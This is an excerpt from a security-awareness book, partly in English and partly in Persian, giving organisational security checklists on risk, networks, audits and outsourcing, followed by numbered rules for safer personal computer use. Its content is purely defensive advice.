• Is there a framework for developing and sustaining security awareness?
Risk Control and Management Framework
Chapters Two, Three, and Four examined common security threats (risk assessment) and described methods for analyzing losses, and the later chapters offered strategies for developing security policies and procedures that strengthen the organization against attacks and accidental losses. As those discussions showed, a response plan includes a list of the results of a practical security evaluation of the assets and proposes a range of initial defensive measures.
The following checklists give more detail on risk assessment and loss prevention.
Risk Review Checklist¹⁸⁹
• Has a risk assessment been carried out recently? How often is this assessment updated?
• Have systems been classified by risk sensitivity (non-sensitive, sensitive, and highly sensitive)?
• Are management objectives based on security principles?
• Are regular audits carried out to test the results of the risk assessment?
• When risks have to be assessed and reduced, are auditors from outside the organization used?
• Have all employees (even managers and system administrators) been evaluated and appointed on the basis of security objectives?
Loss Prevention Checklist¹⁹⁰
• Do you know what it is you are trying to protect?
• Was management also involved in the risk assessment?
• Are the policies written in plain language and easy to understand?
• Does everyone have access to a copy of the policies?
• Does someone personally hold explicit responsibility for the policies and procedures?
• Does the person responsible for the policies attend security conferences and keep his or her security knowledge up to date?
• Do you audit periodically to make sure the security mechanisms are still in place?
• Are you sure that everyone who installs your systems has been trained in your company's security policies and procedures?
• Before putting software and hardware systems into service, do you make sure that all known security problems have been resolved?
• Do you review the audit reports? How often?
Physical Security: Internal and External Networks
Physical security is covered at different levels of detail in Part Two (IT security and individual users), Part Three (this part), and Part Five (IT security and technical administrators). From a technical standpoint, some areas need to be covered from a security perspective, such as internal networks, external networks, and network access control. The following checklists are designed to help protect the physical resources of a networked environment.
184 Log Files
185 Incident Response Plan
186 Business Continuity Plan
187 Source: ITS, Chapter Three, Executive Support, p. 50
188 Source: ITS, Chapter Five, Security Training, p. 81
189 Same source, Chapter Six, Unplanned Security, p. 95
190 Same source, Chapter Two, Innovative Security, p. 32
Internal Network Security Checklist¹⁹¹
• Are there defined policies and procedures for configuring systems?
• Do these policies and procedures cover file access permissions, passwords, and patches?
• Have you disabled unnecessary services?
• Is there a policy for physical security?
• Do all users have passwords?
• Have the default accounts that exist on the system been changed?
• Does the security policy prohibit use of the default "Guest" user accounts?
• Are unused accounts disabled regularly?
• Are new security patches applied as part of the system installation process?
• On the systems you support, do you try to crack passwords that are easy to guess? How often?
• Do you watch for unauthorized changes to files? How often?
• Do you take precautions when copying files?
External Networks and Firewalls Checklist¹⁹²
• Is someone responsible for penetration testing¹⁹³ of the firewall?
• Is it clear who is responsible for updating the firewall (when necessary)?
• Has appropriate investment been made in administering, updating, and maintaining the firewall?
• Do managers understand their own role in the security process and the role of the people who report to them?
• Are emergency roles and responsibilities defined clearly and formally?
• Do support staff follow specific preventive procedures?
• Is intrusion detection software installed on the systems and the network?
• Is audit software installed on all highly sensitive systems?
• Is antivirus software installed at all network entry points?
• Are intrusion experiences shared in order to improve processes?
• Are security roles and responsibilities clearly defined?
• Does someone review the firewall configuration regularly? How often?
Network Access Checklist
• Is management involved in the process of approving connections to external networks?
• Does anyone keep track of connections to outside the organization?
• Do managers know how many employees and contractors are connected to outside the organization?
• Have unnecessary network services been disabled?
• Is the real need for external connections examined before they are approved?
• Does the company audit external connections regularly in order to control them?
• Is there a specific procedure for disabling the connections of employees or contractors who have resigned?
• Are there specific policies and procedures for installing firewalls?
• Are there a specific policy and procedure for setting up customers' connections to external networks?
• Are all connection-related policies and procedures enforced as mandatory?
Security Audits
While an organization spends vast amounts of time and money on developing security policies and procedures, training employees, and attending to security managers and specialists, the effectiveness of these efforts must also be evaluated continually. A security audit reveals those weaknesses in the overall security program that have arisen through growth and change over the life of the organization, or that for whatever reason could not be addressed. Audits can bring a further benefit: if offenders know that you are looking for them, they may limit their activity.
The most common mistakes that security audit procedures can identify are:
• Security patches not installed;
• Excessive file access permissions;
• Simple, guessable passwords;
• Unnecessary network services enabled; and
• Firewall rules unclear or not enforced.
The following checklist is provided to set a baseline for security audits, whether carried out by company staff or by outside specialists.
Audit Procedures Checklist¹⁹⁴
• Do you have a formal audit policy?
• Have you prepared written audit procedures for testing security?
• Are audits carried out on a regular schedule?
• Is audit software installed on all the types of operating system you use (Unix/Linux, Mac, Windows)?
• Is an adequate budget allocated for buying the audit tools that are needed?
• Do managers give the security audit process proper support by making correct training available to the auditors?
Outsourcing
Finally, we recognize that the complexity of IT security may force some organizations to use outside specialists to meet their security needs. The chapter devoted to this topic discussed in depth the points to consider in choosing a partner company, how to manage its activities, and when its activities need to be watched closely.
The following security checklist can serve as a further resource for companies that wish to use an outside contractor for their security activities:
Checklist for Outsourcing Security¹⁹⁵ (Technical Considerations)
• Are connections between vendors and customers (external network connections) audited regularly? How often?
• Is there a formal architecture for connecting vendors and customers to your network through external networks?
• Is there a formal policy that determines when, under what conditions, and in what manner a connection from an external network will be permitted?
• Does starting a connection from an external network require management approval?
• Is some kind of formal audit mandatory before an external network is connected?
191 Same source, Chapter Eight, Internal Network Security, p. 121
192 Same source, Chapter Seven, Supporting Security, p. 109
193 Penetration Testing
194 Source: ITS, Chapter Nine, Outsourcing, p. 133
195 Source: ITS, Chapter Nine, Outsourcing, p. 133
Chapter Twelve
E-Commerce Safety Rules for All Users and Companies
Four Easy Steps to a More Secure Computer
Setting up a computer securely takes a great deal of effort. If you do not have enough time for risk assessment and cost-benefit analysis, we recommend that you follow at least these four simple steps:
1. Decide how important security is to your office. If you believe that security is highly important and that a security incident would cause you heavy losses, then security must be given sufficient priority. If, to prevent security problems, you rely on the part-time help of a busy programmer who has had no formal security training, you are without doubt inviting security problems.
2. Train your users and involve them in developing procedures. Are the users in your office aware of the risks that come from weak security (and of which practices are weak from a security standpoint)? Users must know what to do and whom to contact if they notice something unusual or suspicious. A suitable training program can turn users into part of your defensive system. Keeping users unaware of the system's limitations and of how it works does not increase security, because there are always other sources of information available to determined attackers.
3. Develop a detailed plan for making and storing backups. You must also keep backups away from your office premises, so that you can rebuild your system even after a serious disaster.
4. Be skeptical and curious. If something happens that seems unusual, suspect the presence of an attacker and investigate. You will usually find that the problem came from a mistake or from a flaw in the way the resource was being used. Sometimes, however, a more serious problem may turn up. For this reason, whenever something happens that you cannot explain precisely, you should suspect that the problem is security-related and examine it carefully.
Twenty-Five More Specific Rules for Safer Computer Use
Rule 1. Think about computer theft before it happens.
Rule 2. Make backups regularly, and make sure that they will not be damaged and will remain usable if the computer is physically threatened.
Rule 3. Choose passwords that you can remember easily but that are hard for others to guess.
Rule 4. Always keep your operating system and key software up to date.
Rule 5. Configure your e-mail program so that it does not open attachments¹⁹⁶ automatically.
Rule 6. Before opening any e-mail attachment, look carefully at its name to make sure it is not an executable program.
196 Attachment
‫ﻗﺎﻋﺪﺓ ‪ .۷‬ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﺿﻤﻴﻤﻪﺍﻱ ﺭﺍ ﻛﻪ ﺍﺯ ﻳﻚ ﻏﺮﻳﺒﻪ ﺩﺭﻳﺎﻓﺖ‬
‫ﻛﺮﺩﻩ ﺍﻳﺪ ﺑﺎﺯ ﻧﻜﻨﻴﺪ‪ ،‬ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻓﺎﻳـﻞ‬
‫ﻣﺮﺑﻮﻃﻪ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺣﺎﻭﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺏ ﺑﺎﺷﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۸‬ﺍﺯ ﮔﺸﻮﺩﻥ ﺿﻤﻴﻤﻪﺍﻱ ﻛﻪ ﺍﺯ ﻃﺮﻑ ﻳﻚ ﻓﺮﺩ ﺁﺷـﻨﺎ ﻭ‬
‫ﻣﻄﻤﺌﻦ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﻫﻢ ﭘﺮﻫﻴﺰ ﻛﻨﻴﺪ‪ ،‬ﻣﮕـﺮ ﺁﻧﻜـﻪ‬
‫ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛﻪ ﺁﮔﺎﻫﺎﻧﻪ ﺍﺭﺳﺎﻝ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۹‬ﺑﺮﻧﺎﻣﺔ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ‬
‫ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﻔﻨﻨﻲ ‪ ١٩٧HTML‬ﺭﺍ ﭘـﺮﺩﺍﺯﺵ‬
‫ﻧﻜﻨﺪ ﻭ ﺑﺮﺍﻱ ﺩﻳﮕﺮﺍﻥ ﻫﻢ ﺍﺭﺳﺎﻝ ﻧﻨﻤﺎﻳﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۰‬ﺍﺯ ‪ ISP‬ﺧﻮﺩ ﺑﭙﺮﺳﻴﺪ ﻛﻪ ﺁﻳﺎ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ‬
‫ﭘــﻴﺶ ﺍﺯ ﺗﺤﻮﻳــﻞ ﺑــﻪ ﺷــﻤﺎ ﺍﺯ ﻧﻈــﺮ ﻭﻳــﺮﻭﺱ ﻭ ﻳــﺎ‬
‫ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻳﺎ ﻧﻪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۱‬ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻫﺎﻱ ﻭﺏ ﺍﻣﻜـﺎﻥ ‪ download‬ﻭ ﺍﺟـﺮﺍﻱ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣﺸﻜﻠـﺴﺎﺯ ﺑﺎﺷـﻨﺪ ﺭﺍ‬
‫ﻧﺪﻫﻴﺪ‪ ،‬ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﻣﻄﻤﺌﻦ ﺑﺎﺷـﻴﺪ ﭘﺎﻳﮕـﺎﻩ ﻣﺮﺑﻮﻃـﻪ‬
‫ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺍﺳﺖ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۲‬ﻧﻤﺎﻳﺶ ﺁﺩﺭﺱ ﭘﺎﻳﮕﺎﻩ ﻭﺑـﻲ ﻛـﻪ ﻣـﺮﻭﺭ ﻣـﻲﻛﻨﻴـﺪ ﻭ‬
‫ﺁﺩﺭﺳﻲ ﻛﻪ ﺩﺭﺣﺎﻝ ﺍﺗﺼﺎﻝ ﺑـﻪ ﺁﻥ ﻫـﺴﺘﻴﺪ ﺭﺍ ﻓﻌـﺎﻝ‬
‫ﻛﻨﻴﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﻫﻨﮕـﺎﻡ ﻣـﺮﻭﺭ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻧﺎﺁﺷـﻨﺎ‬
‫ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ‪ ،‬ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺟـﺎﺯﺓ‬
‫ﺍﺟﺮﺍﻱ ﺑﺮﻧﺎﻣﻪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﻣﻲﺩﻫﻴﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۳‬ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ‪cookie‬ﻫﺎ ﺗﺤﺖ ﭼﻪ ﺷﺮﺍﻳﻄﻲ ﺩﺭ‬
‫ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﮔﺮ ﻗﺎﺩﺭ ﺑﻪ ﻛﻨﺘﺮﻝ ﺁﻧﻬـﺎ‬
‫ﻧﻴﺴﺘﻴﺪ )ﻣﺜﻞ ﺯﻣﺎﻧﻴﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻣﻲ ﻛﻨﻴﺪ(‪ ،‬ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﺧﻮﺩ‬
‫ﺭﺍ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻧﻜﻨﻴﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۴‬ﭼﻨﺎﻧﭽﻪ ﻫﺮﮔﻮﻧﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﻭ ﻣﺤﺮﻣﺎﻧـﻪﺍﻱ‬
‫ﺭﻭﻱ ﺻﻔﺤﺔ ﻭﺏ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﺁﻣﺪ‪ ،‬ﭘـﺲ ﺍﺯ ﺍﺗﻤـﺎﻡ‬
‫ﻛﺎﺭ‪ ،‬ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ‪ ١٩٨‬ﺭﺍ ﭘـﺎﻙ ﻛﻨﻴـﺪ‪ .‬ﺍﮔـﺮ ﻗـﺎﺩﺭ ﺑـﻪ‬
‫ﺍﻳﻨﻜﺎﺭ ﻧﻴﺴﺘﻴﺪ )ﻣﺜﻞ ﺯﻣﺎﻧﻴﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤـﻮﻣﻲ‬
‫ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻴـﺪ( ﺷـﺎﻳﺪ ﺑﻬﺘــﺮ ﺑﺎﺷـﺪ ﺍﺯ ﺍﻧﺠـﺎﻡ ﻛــﺎﺭ‬
‫ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﺭﻭﻱ ﺁﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﭙﺮﻫﻴﺰﻳﺪ‪.‬‬
‫‪197 HTML Fancy Scripts‬‬
‫‪198 Cache‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۵‬ﺍﮔﺮ ﺍﺯ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳـﻞ‪ ١٩٩‬ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤـﻲﻛﻨﻴـﺪ‪ ،‬ﺁﻧـﺮﺍ‬
‫ﻏﻴﺮﻓﻌــﺎﻝ ﻛﻨﻴــﺪ‪ .‬ﺍﮔــﺮ ﺍﺯ ﺍﺷــﺘﺮﺍﻙ ﻓﺎﻳــﻞ ﺍﺳــﺘﻔﺎﺩﻩ‬
‫ﻣــﻲﻛﻨﻴــﺪ‪ ،‬ﻧﺎﻣﻬــﺎﻱ ﻛــﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ‬
‫ﻣﺴﺘﺤﻜﻢ ﺑﺮﮔﺰﻳﻨﻴـﺪ ﻭ ﻣﺠﻮﺯﻫـﺎﻱ ﺩﺳﺘﺮﺳـﻲ ﺭﺍ ﺗـﺎ‬
‫ﺣﺪﺍﻗﻞ ﻣﻤﻜﻦ ﻛﻪ ﻫﻤﭽﻨﺎﻥ ﺍﻣﻜﺎﻥ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻣـﻮﺭﺩ‬
‫ﻧﻈﺮ ﺭﺍ ﺑﻪ ﺷﻤﺎ ﻣﻲﺩﻫﺪ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۶‬ﺍﮔﺮ ﺑﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺩﻳﮕﺮﻱ ﻓﺎﻳﻞ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺍﻳﺪ‪،‬‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺁﻧﻬﺎ ﻧﻴﺰ ﻧﻜـﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ‬
‫ﺟﺪﻱ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۷‬ﭘﻴﺎﻣﻬﺎﻱ ﻓﻮﺭﻱ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺴﻴﺎﺭ ﻛﺎﺭﺁﻣـﺪ ﻭ ﻣﻔﻴـﺪ‬
‫ﺑﺎﺷﻨﺪ‪ ،‬ﻭﻟﻲ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎ ﻣﺮﺍﻗﺒﺖ ﻭ ﺁﮔﺎﻫﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۸‬ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫـﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﺩﺳﺘﺮﺳـﻲ ﺭﺍﻫﺒـﺮﻱ‬
‫ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﻧﺪ ‪ -‬ﻣﺜﻞ ﻣﺮﻭﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ‪ -‬ﺣﺘـﻲ‬
‫ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺗﻚﻛﺎﺭﺑﺮﻩ ﻧﻴﺰ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﺍﺯ ﺣـﺴﺎﺏ‬
‫ﻛﺎﺭﺑﺮﻱ ﺭﺍﻫﺒﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۱۹‬ﺗﻤﺎﻡ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻛـﻪ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﻧﻴـﺴﺘﻨﺪ ﻳـﺎ‬
‫ﻛﺎﺭﺑﺮﺩ ﺯﻳﺎﺩﻱ ﻧﺪﺍﺭﻧﺪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۲۰‬ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻛﻪ ﻧﺴﺒﺖ ﺑﻪ ﻭﻳﺮﻭﺱ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﺍﺳﺖ‬
‫ﺭﺍ ﺑﻪ ﻧﺮﻡ ﺍﻓـﺰﺍﺭ ﺿـﺪﻭﻳﺮﻭﺱ ﻣﺠﻬـﺰ ﻛﻨﻴـﺪ ﻭ ﺑـﺮﺍﻱ‬
‫ﺩﺭﻳﺎﻓﺖ ﻧﺸﺎﻧﻬﺎﻱ ﺟﺪﻳﺪ ﻭﻳﺮﻭﺱ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺭﻭﺯﺍﻧﻪ‬
‫ﺁﻧﺮﺍ ﺑﻪﺭﻭﺯ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺑﺎﻳـﺪ ﺑـﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ‬
‫ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺳـﺘﮕﺎﻩ ﺭﺍ ﺍﺯ ﻧﻈـﺮ ﻭﺟـﻮﺩ ﻭﻳـﺮﻭﺱ‪،‬‬
‫ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۲۱‬ﺣﺘﻲ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛـﻪ ﺑﻄـﻮﺭ ﺧـﺎﺹ ﺗﺤـﺖ‬
‫ﺗﻬﺎﺟﻢ ﻭﻳﺮﻭﺳﻬﺎ ﻗـﺮﺍﺭ ﻧﺪﺍﺭﻧـﺪ ‪ -‬ﻣﺜـﻞ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﻣﺒﺘﻨﻲ ﺑﺮ ﻳﻮﻧﻴﻜﺲ ‪ -‬ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﺷﻮﺩ‬
‫ﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ ﺩﻳﮕـﺮ ﻓﺮﺳـﺘﺎﺩﻩ‬
‫ﻣﻲﺷﻮﻧﺪ ﺁﻟﻮﺩﻩ ﺑﻪ ﻭﻳﺮﻭﺱ ﻧﻤﻲﺑﺎﺷﻨﺪ ﻭ ﺑﺮﺍﻱ ﮔﻴﺮﻧﺪﻩ‬
‫ﺧﻄﺮﻱ ﺩﺭ ﺑﺮ ﻧﺪﺍﺭﻧﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۲۲‬ﺗﻤﺎﻡ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺎﻳﺪ ﺑﺎ ﻳﻜﻲ ﺍﺯ ﺍﻧﻮﺍﻉ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗـﺶ‬
‫ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪ ،‬ﭼـﻪ ﺑـﺼﻮﺭﺕ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﻭﻱ ﻫﻤﺎﻥ ﺭﺍﻳﺎﻧﻪ ﻭ ﭼـﻪ ﺑـﺼﻮﺭﺕ ﻳـﻚ‬
‫‪199 File Sharing‬‬
‫‪٢٠٧‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺗﻨﻬﺎ ﺍﺷﺨﺎﺻﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﺎ ﺩﺍﺩﻩﻫﺎ ﻛـﺎﺭ ﻛﻨﻨـﺪ‬
‫ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ )ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ‬
‫ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ ﺟﺪﺍﮔﺎﻧــﻪ ﺑــﺮﺍﻱ ﻣﺤﺎﻓﻈــﺖ ﺍﺯ ﺗﻤــﺎﻡ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻳﻚ ﺷﺒﻜﻪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۲۳‬ﺍﮔﺮ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺍﺑﺰﺍﺭ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ ﺭﺍﻩ‬
‫ﺩﻭﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻴﺪ‪ ،‬ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛـﻪ ﺍﺯ ﺍﻣﻨﻴـﺖ‬
‫ﻣﺴﺘﺤﻜﻤﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ )ﺩﺭ ﺣﺎﻟﺖ ﺣـﺪﺍﻗﻠﻲ‪ ،‬ﺷﻨﺎﺳـﺔ‬
‫ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮ ﹺﺭ ﻣﻨﺎﺳﺐ( ﺗﺎ ﻣﺒـﺎﺩﺍ ﻣﻬﺎﺟﻤـﺎﻥ ﻧﻴـﺰ ﺍﺯ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻨﺪ‪.‬‬
‫ﻗﺎﻋﺪﺓ ‪ .۲۴‬ﺛﺒــﺖ ﮔﺰﺍﺭﺷــﺎﺕ ﺑــﺮﺍﻱ ﻋﻤﻠﻜﺮﺩﻫــﺎ ﻭ ﻛﺎﺭﺑﺮﺩﻫــﺎﻱ‬
‫ﺳﻴﺴﺘﻢ ﺑﺎﻳـﺪ ﺑـﺼﻮﺭﺕ ﻣﻨﻄﻘـﻲ ﻓﻌـﺎﻝ ﺑﺎﺷـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﮔﺰﺍﺭﺷﺎﺕ ﺭﺍ ﻃﺒﻖ ﻳﻚ ﺭﻭﺍﻝ ﻣﺸﺨﺺ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ‬
‫ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ‪ NTFS‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ(‬
‫•‬
‫ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﺭﺍ ﺭﻭﻱ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎ‪،‬‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ‪ ،‬ﻭ ﺗﻤﺎﻡ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ‬
‫ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ‪ .‬ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﺍﻣـﻦ ﻛـﺮﺩﻥ‬
‫ﻧﮕﺎﺭﺷــﻬﺎﻱ ﺟﺪﻳــﺪ ﺳﻴــﺴﺘﻢﻋﺎﻣﻠﻬــﺎ ﺁﺳــﺎﻧﺘﺮ ﺍﺯ‬
‫ﻧﮕﺎﺭﺷﻬﺎﻱ ﻗﺪﻳﻤﻲﺗﺮ ﺍﺳﺖ‪.‬‬
‫•‬
‫ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﺿـﺪﻭﻳﺮﻭﺱ‬
‫ﻭ ﻣﻬﺎﺟﻢﻳﺎﺏ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫•‬
‫ﻱ ﻛﺎﺭﺗﻬــﺎﻱ‬
‫ﻱ ﻓﺎﻳﻠﻬــﺎﻱ ﺩﺍﺩﻩﺍ ﹺ‬
‫ﺑــﺮﺍﻱ ﺭﻣﺰﮔــﺬﺍﺭ ﹺ‬
‫ﺍﻋﺘﺒﺎﺭﻱ ﺑﺎﻳﺪ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﭘﻴﺸﺮﻓﺘﺔ ﺭﻣﺰﻧﮕﺎﺭﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ‪.‬‬
‫•‬
‫ﺑﺎﻳﺪ ﻣﺮﺍﻗﺐ ﺑﻮﺩ ﻛـﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﻣـﻮﻗﺘﻲ‪ ٢٠٠‬ﺷـﺎﻣﻞ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﻧﺸﺪﻩ ﻧﺒﺎﺷﻨﺪ‪ .‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻧﻴﺎﺯﻱ ﺑﻪ‬
‫ﺁﻧﻬﺎ ﻧﺒﺎﺷﺪ ﻧﻪﺗﻨﻬﺎ ﺑﺎﻳﺪ ﺍﺯ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﭘﺎﻙ ﺷﻮﻧﺪ‪،‬‬
